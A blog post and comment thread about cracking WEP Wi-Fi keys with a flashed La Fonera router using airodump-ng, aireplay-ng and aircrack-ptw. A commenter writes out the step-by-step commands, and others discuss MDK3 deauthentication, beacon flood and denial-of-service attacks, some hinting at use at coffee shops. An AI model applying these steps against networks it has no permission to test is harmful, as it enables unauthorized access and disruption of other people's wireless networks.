The DD-WRT firmware for the Fonera does not support packet injection as it does not have the proper patched Mad-wifi driver. I’ve tried to make injection work with the DD-WRT firmware, but to no avail. As soon as injection begins, the router immediately freezes up. I am not going to go into the process of flashing open source firmware. You can find that guides for that at FoneraHacks.com
A quick rundown of what was done:
- * Mount network share for capture files (Fonera does not have enough memory to store capture files)
* Create wireless interface “ath1? in monitor mode
* Start airodump to get quick snapshot
* Restart airodump with “–bssid” option to cut down on file size and “-w” to specify write location
* Start aireplay in fake authentication mode
* Once attack has completed, start aireplay in replay mode
* Collect 35,000 – 60,000 packets (for 128-bit WEP)
* Use aircrack-ptw to decrypt the key
{ 3 trackbacks }
{ 10 comments… read them below or add one }
that was awesome…cant wait to get my hands on my new fonera+ with directional antenna
is it possible for you to do another article on flashing the router? im having trouble flashing mine.
What problems are you having? To tell you the truth, it isn’t that high on my priority list, but I may in the future. The reason for that is, many people have already created very comprehensive tutorials on the process. Here are the two websites I found to be the best and most thorough:
To flash to DD-WRT
http://www.dd-wrt.com/wiki/index.php/LaFonera_Software_Flashing
To flash to Legend
http://www.dd-wrt.com/phpBB2/viewtopic.php?t=16412&postdays=0&postorder=asc&start=0
That’s interesting. I’m suddenly famous. Now I feel obligated to update my firmware.
Trouble flashing? email me: kmeltyblood@gmail.com
Well, it would be great if you could update Legend. I know there’s at least a few loyals running your firmware. I love the web interface, but it’d be awesome if it was finished
I can’t wait to get my new foneras…if you could post a video of an MDK3 attack that would make waiting a little easier haha
I was going to, but I ran into some issues. The DoS and fake AP generator worked fine; however, the client deauthentication attack didn’t go to well. In my environment with 2 wireless clients, MDK3 couldn’t disconnect either of them. I haven’t found many MDK3 users to help me out with that either
I also tried setting MDK3 to perform the “b a d” (DoS, AP gen., and deauth) on startup of the Fonera, but the beacon flood attack just “quit” about 2 minutes after startup and the deauth didn’t really work against my network.
yeah, so denial of service works? Does it just flood the router so it wont pass any traffic? The APgenerator is cool its part of this video I found
http://youtube.com/watch?v=Bq7mWBtNhjs
he uses aireplay for the deauth attack
I assume you are trying to use the startup with your battery pack mod for mobile fun at starbucks or soemthing similar. I should be getting mine soon and am excited to experiment with all these utilities. Its good news that melty seems to want to keep his firmware updated since it seems to be the best for this kind of activity haha
Hello,
I have successfully flashed my fonera to Meltyblood’s Legend Pre-4.5 and have tried following your video tutorial here without success on two separate (and different branded) WEP enabled routers.
The only thing I did to the fonera after flashing to Pre-4.5 is change the default password, nothing else. Here is a run down of the commands I enter, I’ve replaced actual values with place holders (the square brackets and text) to confirm with you guys it’s at least the right *type* of data I should be putting there…
1) wlanconfig ath1 create wlandev wifi0 wlanmode monitor
2) mount.cifs [network share path] /mnt/shared -o username=[username]
3) airodump-ng ath1 (just to check the target AP is ‘visible’ to the fonera)
4) airodump-ng -c 1 –bssid [target AP mac] -w /mnt/shared/capture ath1
5) aireplay-ng -1 0 -e [target AP essid] -a [target AP mac] -h [fonera mac] ath1
6) aireplay-ng -3 -b [target AP mac] -h [fonera mac] ath1
The association was successful at step 5 but it’s at step 6 where I am having problems. The read and sent packets both go up at the same rate but the data value in the airodump-ng cap terminal window stays at the same slow rate it did before I pressed enter on step 6. It does not shoot up to the kind of speeds I’m seeing in your video. I decided to leave it for an hour, come back to find read and sent were both in the two hundred thousand range whereas data had only reached 300, yes just three hundred, no thousands or millions.
If it helps, PWR and RXQ for the AP in question is at (a seemingly healthy) 25 and 100 respectively.
Was I supposed to configure some other settings in Legend after flashing it before I tried this WEP cracking?
Is it because there is supposed to be another user associated to the target AP doing their usual surfing that would help in this cracking process? It’s only me on there trying to hack my own router when I try ^_^
I’m even running BT3 in a VM just like in the video!
Thanks in advance for any help given.
-Greg
Greg,
Since you actually are sending packets in step 6, you should be receiving ARP requests as well. Correct me if I’m wrong. Your procedure is correct also. Some routers are not susceptible to this kind of attack, so you may want to try the attack against another router if you could.
Having another user browsing the web would only speed up the process of receiving ARP requests, which then speeds up the injection process. It is not necessary to have that though and you’ve proved it because you were getting ARP requests (I’m assuming).
You don’t have to configure any additional settings to do the attack either. If the method in the video doesn’t work for you, try the steps in this thread:
http://fonerahacks.com/forums/viewtopic.php?t=24
Scroll about half way down, the post was posted by “orange”. You’ll see an alternate way of injecting packets.